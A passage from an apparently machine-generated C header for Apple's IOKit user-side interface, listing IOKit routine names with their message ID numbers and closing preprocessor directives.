"io_connect_method_scalarI_structureI", 2824 },\ 3744 | { "io_connect_method_structureI_structureO", 2825 },\ 3745 | { "io_registry_entry_get_path", 2826 },\ 3746 | { "io_registry_get_root_entry", 2827 },\ 3747 | { "io_registry_entry_set_properties", 2828 },\ 3748 | { "io_registry_entry_in_plane", 2829 },\ 3749 | { "io_object_get_retain_count", 2830 },\ 3750 | { "io_service_get_busy_state", 2831 },\ 3751 | { "io_service_wait_quiet", 2832 },\ 3752 | { "io_registry_entry_create_iterator", 2833 },\ 3753 | { "io_iterator_is_valid", 2834 },\ 3754 | { "io_catalog_send_data", 2836 },\ 3755 | { "io_catalog_terminate", 2837 },\ 3756 | { "io_catalog_get_data", 2838 },\ 3757 | { "io_catalog_get_gen_count", 2839 },\ 3758 | { "io_catalog_module_loaded", 2840 },\ 3759 | { "io_catalog_reset", 2841 },\ 3760 | { "io_service_request_probe", 2842 },\ 3761 | { "io_registry_entry_get_name_in_plane", 2843 },\ 3762 | { "io_service_match_property_table", 2844 },\ 3763 | { "io_async_method_scalarI_scalarO", 2845 },\ 3764 | { "io_async_method_scalarI_structureO", 2846 },\ 3765 | { "io_async_method_scalarI_structureI", 2847 },\ 3766 | { "io_async_method_structureI_structureO", 2848 },\ 3767 | { "io_service_add_notification", 2849 },\ 3768 | { "io_service_add_interest_notification", 2850 },\ 3769 | { "io_service_acknowledge_notification", 2851 },\ 3770 | { "io_connect_get_notification_semaphore", 2852 },\ 3771 | { "io_connect_unmap_memory", 2853 },\ 3772 | { "io_registry_entry_get_location_in_plane", 2854 },\ 3773 | { "io_registry_entry_get_property_recursively", 2855 },\ 3774 | { "io_service_get_state", 2856 },\ 3775 | { "io_service_get_matching_services_ool", 2857 },\ 3776 | { "io_service_match_property_table_ool", 2858 },\ 3777 | { "io_service_add_notification_ool", 2859 },\ 3778 | { "io_object_get_superclass", 2860 },\ 3779 | { "io_object_get_bundle_identifier", 2861 },\ 3780 | { "io_service_open_extended", 2862 },\ 3781 | { "io_connect_map_memory_into_task", 2863 },\ 3782 | { "io_connect_unmap_memory_from_task", 2864 },\ 3783 | { "io_connect_method", 2865 },\ 3784 | { "io_connect_async_method", 2866 },\ 3785 | { "io_registry_entry_get_registry_entry_id", 2871 },\ 3786 | { "io_connect_method_var_output", 2872 },\ 3787 | { "io_service_get_matching_service", 2873 },\ 3788 | { "io_service_get_matching_service_ool", 2874 },\ 3789 | { "io_service_get_authorization_id", 2875 },\ 3790 | { "io_service_set_authorization_id", 2876 },\ 3791 | { "io_server_version", 2877 },\ 3792 | { "io_registry_entry_get_properties_bin", 2878 },\ 3793 | { "io_registry_entry_get_property_bin", 2879 },\ 3794 | { "io_service_get_matching_service_bin", 2880 },\ 3795 | { "io_service_get_matching_services_bin", 2881 },\ 3796 | { "io_service_match_property_table_bin", 2882 },\ 3797 | { "io_service_add_notification_bin", 2883 },\ 3798 | { "io_registry_entry_get_path_ool", 2885 },\ 3799 | { "io_registry_entry_from_path_ool", 2886 } 3800 | #endif 3801 | 3802 | #ifdef __AfterMigUserHeader 3803 | __AfterMigUserHeader 3804 | #endif /* __AfterMigUserHeader */ 3805 | 3806 | #endif /* _iokit_user_ */ 3807 | --------------------------------------------------------------------------------